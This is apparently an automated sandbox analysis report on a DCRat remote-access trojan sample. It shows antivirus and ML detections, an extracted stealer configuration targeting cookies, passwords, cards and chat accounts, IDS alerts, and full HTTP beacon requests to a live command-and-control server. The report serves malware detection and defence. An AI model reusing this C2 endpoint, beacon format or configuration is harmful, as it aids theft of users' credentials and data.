            Source: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlMAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
            Found malware configuration
            Source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"p\":\"~\",\"B\":\"$\",\"3\":\"*\",\"J\":\"#\",\"c\":\",\",\"i\":\"_\",\"m\":\"!\",\"U\":\"^\",\"V\":\" \",\"b\":\"(\",\"2\":\"<\",\"F\":\">\",\"I\":\".\",\"s\":\"-\",\"M\":\"|\",\"C\":\";\",\"R\":\")\",\"a\":\"@\",\"1\":\"&\",\"6\":\"`\",\"G\":\"%\"}", "PCRT": "{\"v\":\"%\",\"0\":\"!\",\"Q\":\",\",\"Y\":\"|\",\"U\":\"^\",\"F\":\"&\",\"d\":\"`\",\"R\":\"*\",\"K\":\"$\",\"V\":\"(\",\"Z\":\"~\",\"x\":\" \",\"3\":\"-\",\"B\":\";\",\"G\":\">\",\"I\":\"<\",\"X\":\"@\",\"W\":\")\",\"t\":\"#\",\"N\":\".\",\"4\":\"_\"}", "TAG": "m", "MUTEX": "DCR_MUTEX-WVn4oNZYFAP9yGpaqtNX", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeReversingLabs: Detection: 78%
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeReversingLabs: Detection: 78%
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeReversingLabs: Detection: 78%
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeReversingLabs: Detection: 78%
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeReversingLabs: Detection: 78%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exeReversingLabs: Detection: 78%
            Source: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exeReversingLabs: Detection: 78%
            Multi AV Scanner detection for submitted file
            Source: XPC5PMKegV.exeReversingLabs: Detection: 78%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: XPC5PMKegV.exeJoe Sandbox ML: detected
            Source: XPC5PMKegV.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382Jump to behavior
            Source: XPC5PMKegV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51888 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49716 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49725 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49721 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51868 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51883 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49726 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49722 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51865 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49727 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51886 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51862 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51871 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51877 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51887 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49717 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51870 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49724 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51858 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51863 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51890 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51859 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49718 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49719 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51860 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51861 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51864 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51881 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51875 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51878 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51892 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51867 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49723 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49728 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51891 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51884 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51873 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51869 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51874 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51876 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51889 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51882 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51872 -> 92.63.98.227:80
            Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:51885 -> 92.63.98.227:80
            Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
